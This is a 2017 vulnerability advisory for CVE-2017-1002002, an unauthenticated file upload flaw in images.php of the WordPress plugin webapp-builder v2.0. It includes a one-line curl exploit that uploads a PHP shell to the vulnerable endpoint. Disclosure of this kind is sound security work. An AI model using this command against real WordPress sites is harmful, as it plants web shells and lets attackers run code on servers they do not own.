| Title: Unrestricted File Upload vulnerability in Wordpress Plugin webapp-builder v2.0 |
| Author: Larry W. Cashdollar, @_larry0 |
| Date: 2017-03-01 |
| CVE IDs:[CVE-2017-1002002] |
| Download Site: https://wordpress.org/plugins-wp/webapp-builder/ |
| Vendor: Invedion |
| Vendor Notified: 2017-03-01 |
| Vendor Contact: plugins@wordpress.org |
| Advisory: http://www.vapidlabs.com/advisory.php?v=181 |
| Description: "Make your WordPress website mobile-friendly app (Ready for Google Play & Appstore) with just a few clicks." |
| Vulnerability: The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com/
The code in file ./webapp-builder/server/images.php doesn't require authentication or check that the user is allowed to upload content.
It also doesn't sanitize the file upload against executable code.
See:
https://plugins.svn.wordpress.org/webapp-builder/trunk/server/images.php |
| Export: JSON TEXT XML |
| Exploit Code: $ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/webapp-builder/server/images.php" |
| Screen Shots: |
| Notes: |